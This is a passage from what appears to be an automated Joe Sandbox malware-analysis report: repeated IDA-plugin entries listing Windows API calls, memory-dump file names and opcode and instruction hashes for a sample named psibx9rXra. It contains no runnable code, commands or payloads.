                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: HandleLoadModuleString$Message_wprintf
                                                • String ID: %s (%d) : ==> %s: %s %s
                                                • API String ID: 3648134473-3128320259
                                                • Opcode ID: efe18c764163be2beaff56429f1c07fe6e32b5de4023f342db8b76e728fe92f8
                                                • Instruction ID: f295cf3f3f881f2c9e86601c670d269574f37e58bc97befa04364af7e98f3280
                                                • Opcode Fuzzy Hash: efe18c764163be2beaff56429f1c07fe6e32b5de4023f342db8b76e728fe92f8
                                                • Instruction Fuzzy Hash: FA0162F7900209BFE732D7A0DD89EE7776CEB08310F000595B785E6045EA795E856B70
                                                APIs
                                                  • Part of subcall function 00F82612: GetWindowLongW.USER32(?,000000EB), ref: 00F82623
                                                • GetSystemMetrics.USER32(0000000F), ref: 0100D47C
                                                • GetSystemMetrics.USER32(0000000F), ref: 0100D49C
                                                • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0100D6D7
                                                • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0100D6F5
                                                • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0100D716
                                                • ShowWindow.USER32(00000003,00000000), ref: 0100D735
                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 0100D75A
                                                • DefDlgProcW.USER32(?,00000005,?,?), ref: 0100D77D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                • String ID:
                                                • API String ID: 1211466189-0
                                                • Opcode ID: 736f1bcfc4efffc9c22f7d20110863f3dfd69a5efe3181a2bee7b502d4e6f365
                                                • Instruction ID: 2a74ecb463ef67f186f55899a6258907ec9219eff711188c43f8eb265e9d13ff
                                                • Opcode Fuzzy Hash: 736f1bcfc4efffc9c22f7d20110863f3dfd69a5efe3181a2bee7b502d4e6f365
                                                • Instruction Fuzzy Hash: 99B18E75500215EBEF16CFA8C9C57AD7BF1BF08701F0481A9ED889F295EB35A950CB60
                                                APIs
                                                • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00FBC1C7,00000004,00000000,00000000,00000000), ref: 00F82ACF
                                                • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00FBC1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00F82B17
                                                • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00FBC1C7,00000004,00000000,00000000,00000000), ref: 00FBC21A
                                                • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00FBC1C7,00000004,00000000,00000000,00000000), ref: 00FBC286
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: ShowWindow
                                                • String ID:
                                                • API String ID: 1268545403-0
                                                • Opcode ID: 90e0c7b61f6d970c94142949ef70b3b5c858684c759664a4cb0401088a4282bd
                                                • Instruction ID: ff220b2a38a249a6212d73d5ab4a23395f6a75063d3884869ed8d345045ab166
                                                • Opcode Fuzzy Hash: 90e0c7b61f6d970c94142949ef70b3b5c858684c759664a4cb0401088a4282bd
                                                • Instruction Fuzzy Hash: C8410975A04680ABD7BEBB29CC8CBEB7B92BF85320F14881DE08786550C67DB841F751
                                                APIs
                                                • InterlockedExchange.KERNEL32(?,000001F5), ref: 00FE70DD
                                                  • Part of subcall function 00FA0DB6: std::exception::exception.LIBCMT ref: 00FA0DEC
                                                  • Part of subcall function 00FA0DB6: __CxxThrowException@8.LIBCMT ref: 00FA0E01
                                                • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00FE7114
                                                • EnterCriticalSection.KERNEL32(?), ref: 00FE7130
                                                • _memmove.LIBCMT ref: 00FE717E
                                                • _memmove.LIBCMT ref: 00FE719B
                                                • LeaveCriticalSection.KERNEL32(?), ref: 00FE71AA
                                                • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00FE71BF
                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 00FE71DE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                • String ID:
                                                • API String ID: 256516436-0
                                                • Opcode ID: 934558f65227189725eb51dd1528be91423f72e4e38e1d51b483a016da108073
                                                • Instruction ID: 540cf46d4013517ae2d5507fe0fce1951d7f6ace4f6e0ab77e08e11bcfbc7d08
                                                • Opcode Fuzzy Hash: 934558f65227189725eb51dd1528be91423f72e4e38e1d51b483a016da108073
                                                • Instruction Fuzzy Hash: 00318172900205EBCF20EFA5EC859AEB778EF46310F1441A5F944AB246DB799E10EB60
                                                APIs
                                                • DeleteObject.GDI32(00000000), ref: 010061EB
                                                • GetDC.USER32(00000000), ref: 010061F3
                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 010061FE
                                                • ReleaseDC.USER32(00000000,00000000), ref: 0100620A
                                                • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 01006246
                                                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 01006257
                                                • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0100902A,?,?,000000FF,00000000,?,000000FF,?), ref: 01006291
                                                • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 010062B1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                • String ID:
                                                • API String ID: 3864802216-0
                                                • Opcode ID: e3e4a3904164e8b6644fced56d34bc63152b08513ff9236710a85f2b5239ecbe
                                                • Instruction ID: bb5598abdb2b263211c9167ca133f7844bbd49eac758033c736db3050e10f05d
                                                • Opcode Fuzzy Hash: e3e4a3904164e8b6644fced56d34bc63152b08513ff9236710a85f2b5239ecbe
                                                • Instruction Fuzzy Hash: 18319F72100610BFEB228F64CC8AFEA3FA9EF49761F044055FE889A181C67A9851CB70
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: _memcmp
                                                • String ID:
                                                • API String ID: 2931989736-0
                                                • Opcode ID: e29a957a8fee59d6ed373a0800bb8ca646aab1b634a50d59a3482564587685f2
                                                • Instruction ID: 02bc973c41393c18fe0173d761c9e52c2526392bb798e62bf3b98504787e5442
                                                • Opcode Fuzzy Hash: e29a957a8fee59d6ed373a0800bb8ca646aab1b634a50d59a3482564587685f2
                                                • Instruction Fuzzy Hash: 88210AB2B00205B7E604AE269D42FFB735EBF56358F1E4017FD055A307EB18EE10A2A1
                                                APIs
                                                  • Part of subcall function 00F89837: __itow.LIBCMT ref: 00F89862
                                                  • Part of subcall function 00F89837: __swprintf.LIBCMT ref: 00F898AC
                                                  • Part of subcall function 00F9FC86: _wcscpy.LIBCMT ref: 00F9FCA9
                                                • _wcstok.LIBCMT ref: 00FEEC94
                                                • _wcscpy.LIBCMT ref: 00FEED23
                                                • _memset.LIBCMT ref: 00FEED56
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                • String ID: X
                                                • API String ID: 774024439-3081909835
                                                • Opcode ID: f73a16f360949ec2ac4e6b8fa5ccc03f73c14026e485d4cd081b592909cbb87d
                                                • Instruction ID: 26b2d7635a06420068356ffc0dc7bcc919af3b1648a5f7f6515cf83f32b0bfa4
                                                • Opcode Fuzzy Hash: f73a16f360949ec2ac4e6b8fa5ccc03f73c14026e485d4cd081b592909cbb87d
                                                • Instruction Fuzzy Hash: 8DC19F715083419FC724FF24DC81AAAB7E4BF85310F14492DF8999B2A2DB74ED45EB82
                                                APIs
                                                • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00FF6C00
                                                • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00FF6C21
                                                • WSAGetLastError.WSOCK32(00000000), ref: 00FF6C34
                                                • htons.WSOCK32(?,?,?,00000000,?), ref: 00FF6CEA
                                                • inet_ntoa.WSOCK32(?), ref: 00FF6CA7
                                                  • Part of subcall function 00FDA7E9: _strlen.LIBCMT ref: 00FDA7F3
                                                  • Part of subcall function 00FDA7E9: _memmove.LIBCMT ref: 00FDA815
                                                • _strlen.LIBCMT ref: 00FF6D44
                                                • _memmove.LIBCMT ref: 00FF6DAD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                • String ID:
                                                • API String ID: 3619996494-0
                                                • Opcode ID: f58a6f1ae0fc5c251f96112d2304798230c57853030efa56efd325b320140f02
                                                • Instruction ID: 9e6e8b369381d0e9f00fd04a7afa08a2ecc95fc7d4bf2f0de531b40ddfdc98ea
                                                • Opcode Fuzzy Hash: f58a6f1ae0fc5c251f96112d2304798230c57853030efa56efd325b320140f02
                                                • Instruction Fuzzy Hash: 4A81CF72608204ABC710FF24CC82FBEB7A8AF84724F14491CF6559B2A2DE75DD05E752
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a8dbde1f0a7134ff8fdc0fda5ee4509d175e0d1f4bfff6791ad6762c7a23c7e5
                                                • Instruction ID: 1b0540c5aba3108b5e1619cd8b7a8c6e53d312850ae04fa6ba64d5708444fe69
                                                • Opcode Fuzzy Hash: a8dbde1f0a7134ff8fdc0fda5ee4509d175e0d1f4bfff6791ad6762c7a23c7e5
                                                • Instruction Fuzzy Hash: 58717031900109EFDB15DF59CC45AFEBB79FF86320F248249F915AA251C734AA52EF60
                                                APIs
                                                • IsWindow.USER32(01914B08), ref: 0100B3EB
                                                • IsWindowEnabled.USER32(01914B08), ref: 0100B3F7
                                                • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0100B4DB
                                                • SendMessageW.USER32(01914B08,000000B0,?,?), ref: 0100B512
                                                • IsDlgButtonChecked.USER32(?,?), ref: 0100B54F
                                                • GetWindowLongW.USER32(01914B08,000000EC), ref: 0100B571
                                                • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0100B589
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                • String ID:
                                                • API String ID: 4072528602-0
                                                • Opcode ID: 8a0099fb1a9ada0fe1f31bd73d056497e413dc0847447d50d745996040f5f408
                                                • Instruction ID: adf7fb7d6f082a827ea6fcb10dedeba57e44def9cbc053115e5251d46bc3f10d
                                                • Opcode Fuzzy Hash: 8a0099fb1a9ada0fe1f31bd73d056497e413dc0847447d50d745996040f5f408
                                                • Instruction Fuzzy Hash: 71717E78604205AFFB62DF68C894FAA7BE5FF09300F154099EAC597291CB36AA41DB50
                                                APIs
                                                • _memset.LIBCMT ref: 00FFF448
                                                • _memset.LIBCMT ref: 00FFF511
                                                • ShellExecuteExW.SHELL32(?), ref: 00FFF556
                                                  • Part of subcall function 00F89837: __itow.LIBCMT ref: 00F89862
                                                  • Part of subcall function 00F89837: __swprintf.LIBCMT ref: 00F898AC
                                                  • Part of subcall function 00F9FC86: _wcscpy.LIBCMT ref: 00F9FCA9
                                                • GetProcessId.KERNEL32(00000000), ref: 00FFF5CD
                                                • CloseHandle.KERNEL32(00000000), ref: 00FFF5FC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                • String ID: @
                                                • API String ID: 3522835683-2766056989
                                                • Opcode ID: 71ccdd8c91a4354822b4c952c6b5b86993d5cba42fab1c81f74b1ceaf41395d6
                                                • Instruction ID: ff9f4b3ed25957947d998f082202e8f32bb3971ba4b4c1b72d55cfc0c8affbcc
                                                • Opcode Fuzzy Hash: 71ccdd8c91a4354822b4c952c6b5b86993d5cba42fab1c81f74b1ceaf41395d6
                                                • Instruction Fuzzy Hash: C761D171A00619DFCF14EF54C8809AEBBF4FF49324F188069E855AB361CB74AD45EB80
                                                APIs
                                                • GetParent.USER32(?), ref: 00FE0F8C
                                                • GetKeyboardState.USER32(?), ref: 00FE0FA1
                                                • SetKeyboardState.USER32(?), ref: 00FE1002
                                                • PostMessageW.USER32(?,00000101,00000010,?), ref: 00FE1030
                                                • PostMessageW.USER32(?,00000101,00000011,?), ref: 00FE104F
                                                • PostMessageW.USER32(?,00000101,00000012,?), ref: 00FE1095
                                                • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00FE10B8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: MessagePost$KeyboardState$Parent
                                                • String ID:
                                                • API String ID: 87235514-0
                                                • Opcode ID: 2496702346e08df30cc632cb50f17cfb1e58b9699b2dc3ccc12ae575f815758e
                                                • Instruction ID: 37b91dfe4628d8f8f78b832e49ff2bceb327abe55026bc6f9cec8d92ea82b79c
                                                • Opcode Fuzzy Hash: 2496702346e08df30cc632cb50f17cfb1e58b9699b2dc3ccc12ae575f815758e
                                                • Instruction Fuzzy Hash: B151F670A047D53EFB3642368C15BBABEA96B06314F0C8589E2D5468C3C6E9DCD8F751
                                                APIs
                                                • GetParent.USER32(00000000), ref: 00FE0DA5
                                                • GetKeyboardState.USER32(?), ref: 00FE0DBA
                                                • SetKeyboardState.USER32(?), ref: 00FE0E1B
                                                • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00FE0E47
                                                • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00FE0E64
                                                • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00FE0EA8
                                                • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00FE0EC9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: MessagePost$KeyboardState$Parent
                                                • String ID:
                                                • API String ID: 87235514-0
                                                • Opcode ID: 855ece47be971be2f117609a29fc2543c4d4f2257185e32b92cd5ca9d34eac79
                                                • Instruction ID: 69205ac06c3a3110e40badb11f1a41c45c983dfb1f7855ea69eb8e63c8c4d25e
                                                • Opcode Fuzzy Hash: 855ece47be971be2f117609a29fc2543c4d4f2257185e32b92cd5ca9d34eac79
                                                • Instruction Fuzzy Hash: 065106A09047D63DFB3283768C45B7A7FA9AB06310F088999F1D4564C2CBE5ACD8F761
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: _wcsncpy$LocalTime
                                                • String ID:
                                                • API String ID: 2945705084-0
                                                • Opcode ID: 01eebcefeb46f2f08028d4a6593ba6f31c7605ee681d50124331d4e78d275c66
                                                • Instruction ID: db3ddbc8179849ae558083ab7065edccd4001d64f013ab11a62e98f4da03dbde
                                                • Opcode Fuzzy Hash: 01eebcefeb46f2f08028d4a6593ba6f31c7605ee681d50124331d4e78d275c66
                                                • Instruction Fuzzy Hash: 8941D6A5C1061876CB11EBB8CC46ACFB3B89F46710F508856F509E3221FB38E355E7A6
                                                APIs
                                                  • Part of subcall function 00FE466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00FE3697,?), ref: 00FE468B
                                                  • Part of subcall function 00FE466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00FE3697,?), ref: 00FE46A4
                                                • lstrcmpiW.KERNEL32(?,?), ref: 00FE36B7
                                                • _wcscmp.LIBCMT ref: 00FE36D3
                                                • MoveFileW.KERNEL32(?,?), ref: 00FE36EB
                                                • _wcscat.LIBCMT ref: 00FE3733
                                                • SHFileOperationW.SHELL32(?), ref: 00FE379F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
